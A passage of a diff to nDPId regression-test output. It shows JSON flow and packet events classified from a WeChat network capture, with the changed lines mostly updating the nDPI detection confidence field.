{"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1492171290232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAABDMalAAEARhEvAqAFnwKgB\/qMfADUAL1ZyUSMBAAABAAAAAAAAATIGZGViaWFuBHBvb2wDbnRwA29yZwAAHAAB"} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1670,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1670,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1492171290232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Mx1AAEAGXPLAqAFnQOmnvNO9AbuA1BLzAh8CfoAQAT2IFAAAAQEICgA\/vqCGKY\/Q"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1492171291761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1492171291761,"pkt":"8IQvSpdgeJKcD6iOCABFAABIMrNAAEARgzzAqAFnwKgB\/tELADUANPxl\/4EBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492171250302,"flow_last_seen":1492171253304,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492171175912,"flow_last_seen":1492171268600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492171206877,"flow_last_seen":1492171210973,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492171206877,"flow_last_seen":1492171210973,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
+00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171267294,"flow_last_seen":1492171269750,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -639,8 +637,8 @@ 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1492167905561,"flow_last_seen":1492167907207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1492167342893,"flow_last_seen":1492167478295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6421,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1492167353674,"flow_last_seen":1492167907140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":65142,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1492167342893,"flow_last_seen":1492167478295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6421,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1492167353674,"flow_last_seen":1492167907140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":65142,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492171250302,"flow_last_seen":1492171253304,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.Tencent","breed":"Acceptable","category":"SocialNetwork"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -671,7 +669,7 @@ 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171267294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 